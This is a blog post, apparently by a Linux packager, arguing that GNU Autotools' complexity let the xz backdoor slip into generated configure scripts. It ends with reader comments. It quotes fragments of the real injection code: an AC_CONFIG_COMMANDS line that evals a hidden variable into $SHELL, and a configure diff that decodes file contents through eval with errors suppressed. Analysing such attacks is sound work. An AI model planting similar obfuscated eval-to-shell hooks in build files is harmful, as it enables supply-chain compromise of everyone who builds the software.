xz backdoor and autotools insanity

I’ve been arguing for more than a decade now that GNU Autotools is too complicated, unnecessary, and stupid. The latest xz backdoor simply adds more fuel to the fire.

First a little bit of background. I have been doing package-related stuff for Linux for more than 20 years now. I’m competent with Debian, RPM and Arch Linux packaging systems, in addition to compiling my whole system by hand (LFS) and cross compiling systems for embedded devices (buildroot). I’ve also maintained Windows installers.

Additionally I have experience with autotools, make, ninja, and several custom build systems.

So I have a good idea how libraries are supposed to be built, but in my experience virtually no one knows how to do it. Here you’ll see a clear example of that.

This article is not about the backdoor itself, plenty of researchers are surely working on that. This is about what enabled the introduction of the backdoor in the first place and how to ensure it never happens again.

If the xz project had not been using autotools, installing the backdoor would not have been possible. It’s as simple as that.

GNU Autotools primer

In order to understand how the backdoor was so easily introduced, you need to understand what autotools is in the first place. Basically it’s a build system, but an unnecessarily complex one.

I’m going to describe the typical sequence of steps so you get a rough idea:

  1. Run autogen.sh script (generates configure)
  2. Run configure script (generates Makefile files)
  3. Run make
  4. Run make install

Now, even though an autogen.sh script is typical, it’s not necessary, and most of the time you can just run autoreconf --force --install and that would basically do the same thing.

Once everything is in place, you can run the configure script which is going to do runtime checks to see the features that your system has, and its main purpose is to generate Makefile files so you can do the next step.

Now, I’m going to spoil the surprise and tell you that it’s at this step that the backdoor is introduced, specifically this line:

AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])

They made a good job of hiding what this actually does by introducing several levels of indirection, but essentially the command is in gl_localedir_config, which they themselves introduced, by calling it gl_[$1]_config ($1 being localedir).

Then you do make and make install, but at that point the code is already tampered with.

Why did nobody catch this?

Yes, it was obfuscated, but eval $anything | $SHELL seems highly suspicious, even to my eyes untrained in security analysis. Are open source developers blind?

The “magic” of autotools

One really cool feature of autotools is that you don’t have to do every step every time. That means that one person does autoreconf in one machine which will generate the configure script, and then package the result so everyone else just runs the script, even if they don’t have autotools installed.

One machine might run ./configure and figure out that ifunc is not available, but in another machine it would be.

So the configure script is generic, but the resulting Makefiles would be different in different machines. Therefore when you do make dist, the Makefiles are not included in the tarball, only the configure script, which is generated from configure.ac.

Pretty neat, right?

No, we’ll soon see why it isn’t, but long story short: if tarball xz-5.6.1.tar contains files that are not part of the git repository, but were generated, what stops a malicious actor from modifying those files? Nothing. Distributions have to trust that the people who created the tarballs did not include anything make dist on a clean git checkout doesn’t include, and it’s extremely hard to check.

One of those files is m4/build-to-host.m4, that is supposed to come from gnulib and copied when you run autoreconf --install, but the nefarious actors modified it. This is the file a lot of analysts are mentioning, because that’s the one where the modifications are easier to spot, but that is not really dangerous because the user is not going to run it. The dangerous modification is in the configure script, which is the one users are going to run.

For example, a Debian maintainer might decide to run make dist on his machine, compare the result with the official tarball and see that the configure script is different, but that could be because the official tarball was generated with a newer version of autoconf, or gnulib, or whatever. So the fact that it’s different could be totally benign.

In my experience the files generated by autotools are drastically different in different machines because everyone is using different versions of those tools.

The convenience of autotools — which generates a configure script which doesn’t require autotools or a development version of gnulib in order to run — is biting us in the ass.

So, configure.ac contains a line AM_GNU_GETTEXT([external]), that macro is inside m4/gettext.m4, which calls gl_BUILD_TO_HOST([localedir]), that macro is inside m4/build-to-host.m4. The malicious actors inserted code in that macro, then ran autoreconf, which generated the configure script which installs their backdoor.

The only reason this was possible in the first place is that GNU Autotools is so horrendously complex that nobody really checks the mess it generates.

Even in an uncompromised tree, the resulting configure script is 25,697 lines of obfuscated shell script. Good luck finding anything malicious there.

The malicious developers did not have to include their m4/build-to-host.m4 in the tarball, because the configure script already contained the tainted code, but if some maintainer ran the autogen.sh script, configure would be regenerated with the benign version. Including the m4 script ensures that even in that case the backdoor would remain. Even if you do aclocal --force --install, the malicious m4 script would still remain (for some reason aclocal doesn’t copy scripts that already exist).

Totally unnecessary

The saddest part of this saga is that autotools is not needed at all. It doesn’t serve any purpose.

Let’s create a simple library:

#include <hello.h>

const char *hello(void)
{
	return "hello";
}

We follow the steps to build a library with libtool and gettext, and then we do make dist. The resulting files in the tarball contain 52,466 lines: that’s more than fifty thousand lines to build a library with a single function.

All we really needed to build the library was this:

gcc -shared -I. -fPIC main.c -Wl,-soname,libhello.so.0 -o libhello.so.0

What on Earth is autotools doing? OK, here’s one check:

checking for gcc option to enable C11 features... none needed

Judging from the dozens of lines of pretty undecipherable code, it seems this is trying to compile a C program with C11 features — like anonymous structs — without specifying any flags, and if that fails, then try with -std=gnu11, if that succeeds, then use that flag for the rest of the compilation.

Why? I’m not using C11, and I never told autotools to ensure support for C11.

Imagine the billions of unnecessary checks autotools is doing on god knows how many package builds.

OK, maybe I’m being unfair, maybe there are cases where these checks are necessary, for example when cross compiling to other architectures… But that’s actually my area of expertise, and in fact autotools makes cross compilation more difficult. Projects like scratchbox2 were created precisely to deal with code which relies on autotools’ runtime checks too much. Just google “cannot run test program while cross compiling”.

Back in the days when I was working to create the Nokia N9, I wrote a blog post precisely to explain why we were using scratchbox, and it starts with a case where the configure script failed on ARM cross compilation. The solution was to manually set the characteristics of the system, for example ac_cv_func_posix_getgrgid_r=yes. But if we have to manually specify that the system has a POSIX-conformant getgrgid_r, we might as well do it on a Makefile:

make HAVE_POSIX_GETGRGID_R=yes

That’s in fact how you pass configurations to git’s build system, which is just Makefiles: make NO_POSIX_GOODIES=UnfortunatelyYes. But this is done by default for Windows, so you don’t actually need to specify that.

Thanks for nothing autotools.

Solve stupid problems

Let’s take a look at one configuration autoconf generates for xz:

/* The size of 'size_t', as computed by sizeof. */
#define SIZEOF_SIZE_T 8

What is wrong with sizeof(size_t)?

Well, according to the comment generated, HP’s C compiler HP92453-01 B.11.11.23709.GP has a bug interpreting declarations like int a3[[(sizeof (unsigned char)) >= 0]], so a cast to a long int is needed to get the correct number. Right, but that was in 2001, why are we forcing thousands of packages to do this unnecessary check? Maybe it’s already fixed. Even if it’s not, SIZEOF_SIZE_T is only used to compute SIZE_MAX if it’s not defined, which may be the case even in HP’s buggy C compiler. And this has nothing to do with sizeof() inside an array anyway. Even if sizeof(size_t) somehow failed, that’s a problem for them. If anyone does actually try to compile xz for that platform, they can just patch the source code. Why does everyone need to check this?

You don’t put “careful, the coffee is hot” on every cup of coffee just because that one time when a person burned herself.

No. Don’t design for the lowest common denominator. It’s prematurely worrying about something that will never happen.

“I make up problems, and then I write overly complicated crap code to solve them.”

Linus Torvalds

Worry when somebody actually has an issue compiling xz with an HP C compiler.

A simple Makefile can build liblzma just fine. As a proof of concept I created it in my own liblzma project: Makefile. It builds and works perfectly fine, although more fine tuning would be needed to support more configurations, but it’s not bad for a couple of hours of work.

The origin of the backdoor

After playing around with xz’s build system, it is now clear to me what started everything.

// Set up the locale and message translations.
tuklib_gettext_init(PACKAGE, LOCALEDIR);

In order to properly setup the translations, we need to specify the location of the translated files. In my system that location is “/usr/share/locale”. But the way that you are supposed to define this variable is with something like the C compiler flag -DLOCALEDIR=\"/usr/share/locale\", and that’s what xz does: -DLOCALEDIR=\"$(localedir)\".

But according to GNU’s gettext manual, it should be -DLOCALEDIR=$(localedir_c_make). Here’s part of a generated Makefile:

prefix = /usr
datarootdir = ${prefix}/share
localedir = ${datarootdir}/locale
localedir_c = "/usr/share/locale"
localedir_c_make = \"$(localedir)\"

We can clearly see that these two things are equivalent.

gnulib’s m4 macro build-to-host.m4 is trying to help by adding the quotes automatically. This is part of the generated configure script:

localedir_c=`printf '%s\n' "$gl_final_localedir" | sed -e "$gl_sed_double_backslashes" -e "$gl_sed_escape_doublequotes" | tr -d "$gl_tr_cr"`
localedir_c='"'"$localedir_c"'"'
localedir_c_make=`printf '%s\n' "$localedir_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
	localedir_c_make='\"$(localedir)\"'
fi

And right there is where the malicious actors swept in the beginning of their exploit:

--- a/configure
+++ b/configure
@@ -4,3 +4,8 @@
 if test "$localedir_c_make" = '\"'"${gl_final_localedir}"'\"'; then
 	localedir_c_make='\"$(localedir)\"'
 fi
+if test "x$gl_am_configmake" != "x"; then
+	gl_localedir_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_localedir_prefix -d 2>/dev/null'
+else
+	gl_localedir_config=''
+fi

Weirdly enough the malicious code does look eerily similar to the benign code, because both are unnecessarily obfuscated.

This is not some weird macro xz was using, all autotools code has that macro, at least all the code that uses gettext’s translations with AM_GNU_GETTEXT(). But even if we all in the industry start to check for modifications to build-to-host.m4 assiduously, bad actors can simply modify another macro, or just the configure script.

All this just to add quotes to a variable xz’s build system isn’t even using.

How is this not insane?

Ain’t nobody got time for that

I do not blame Debian package maintainers nor xz developers for not spotting the malicious m4 code: m4 is horrible.

Here is a completely benign m4 fix I sent to the zsh developers: autoconf: prepare for 2.70.

Did anybody review that code carefully? Even I didn’t want to review my own code a couple of months later.

I blame them for using autotools. That’s their mistake. Nobody has the time to review the mess these tools generate.

No hope

At this point you may be able to see the level of insanity that autotools brings, and the solution is simple: stop using it. There’s better build systems like CMake or meson (at least that’s what I’m told), but in fact plain Makefiles are superior.

I was arguing that back in 2010 and nobody listened. I created an entire project (libpurple-mini) just to be able to cross compile using a simple Makefile rather than their autotools system and that way easily link another project to the cross compiled library. Did libpurple developers move away from autotools? No, they decided to maintain two build systems, because autotools wasn’t good for Windows. The second build system was Makefiles. So Makefiles for Windows and autotools for everything else. Why not Makefiles for everything? Especially since I had already created them for Linux.

Don’t ask me.

Oh yeah, autotools is supposed to help portability, but relies on tools that are not easily available on Windows, and does many forks, which Windows is notoriously bad at handling. That’s why you are better off using Makefiles in Windows.

One of the highlighted aspects of this saga is the burnout of open source developers who create great tools entirely for free. That is what pressured the maintainer of xz to trust a malicious developer, isn’t it?

In my opinion Lasse Collin should have held to his reigns and let the project stagnate if he didn’t have the time to properly review changes. That’s better than hastily accepting contributors.

But that is what I did with my git-remote-hg project — which I authored and worked entirely for free for years — and as a result of my caution Debian decided to package a fork instead: debian’s git-remote-hg, is somebody else’s code. Yes Debian maintainers, you know more than the author of git-remote-hg about what’s better for git-remote-hg, just like you know better than OpenSSH developers about what’s safe to link to (if they hadn’t linked openssh with libsystemd the hack would not have been possible).

The truth is that as an open source maintainer working for free you can’t win.

Some may be thinking that I dislike open source, but it’s the complete opposite. I just think 99% of it is badly maintained. And no: closed source is not maintained any better.

Cargo cult

I remember a story about a daughter replicating her mom’s chicken recipe which involved cutting away part of it, but when her husband inquired as to why that was the case, she didn’t know what to answer. When she eventually asked her mom, the answer was “because the chicken doesn’t fit on my pot”.

The term cargo cult comes from people in the islands of Melanesia who devised airplane marshaling gear with coconuts in order for planes with cargo to come, after the Westerners left and no more planes were coming.

These Melanesians did not know why the airplane marshals did what they did, they simply repeated their actions.

And that’s the reason people keep using autotools and other complex build systems: because nobody stops to think: why do I need this? Everyone just repeats what everyone else is doing. Just do whatever Stack Overflow says, right?

GNU software is the epitome of cargo cult, that’s why their shell scripts are riddled with checks like:

test "x$foo" = xyes

Unless you live in 1995, the x-hack is not necessary, and even in the cases where it was, it’s when $foo contains special characters, not when the string is just “yes” or “no”.

GNU developers would rather keep doing things like they were done in the 1990s (although even then it was a bad practice) and complicate billions of scripts rather than think for two seconds and ask why they are doing that.

Let’s all keep doing what we have been doing for decades and never question why.

What’s the worst thing that could happen?

7 thoughts on “xz backdoor and autotools insanity

  1. Pingback: xz backdoor and autotools insanity - CodeGurus

  2. What tools have you actually designed that caused significant impact in helping build thousands of programs that are currently running?
    And probably mission critical?
    From the superficiality of your “article”, i guess none!

    Liked by 1 person

  3. On an existing established project, keeping autotools and other complex build systems is not a cargo cult but done primarily because porting the necessary old checks and tests to a new system is a lot of work. Many may be obsolete but removing them can require a certain amount of care if you don’t want to break builds for users on more unusual platforms. Something like zsh deals with enough lower level system things like resource limits and signals that it needs some sort of checks at build time. Meson can probably handle that but replicating it would be work and the first step to doing that is to identify all the crap like special-cases for 2001-era compilers to strip. If as a developer, you still have users on AIX, HP/UX and Solaris but don’t have access to such systems yourself, then it can be tricky to test changes.

    But, I’d agree there’s no good reason for using autoconf on a brand new project today.

    Like

  4. This is a myth. Git compiles perfectly fine on fringe platforms like Solaris, and AIX without any checks, just a simple Makefile.

    This is an appeal to incredulity fallacy: “I don’t see how X could compile without checks”. The fact that you don’t see how it could be possible doesn’t mean it isn’t.

    Like

  5. Pingback: Is Linux Really Secure? – Both.org

  6. Pingback: Simplifying the xz backdoor | Felipe Contreras

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.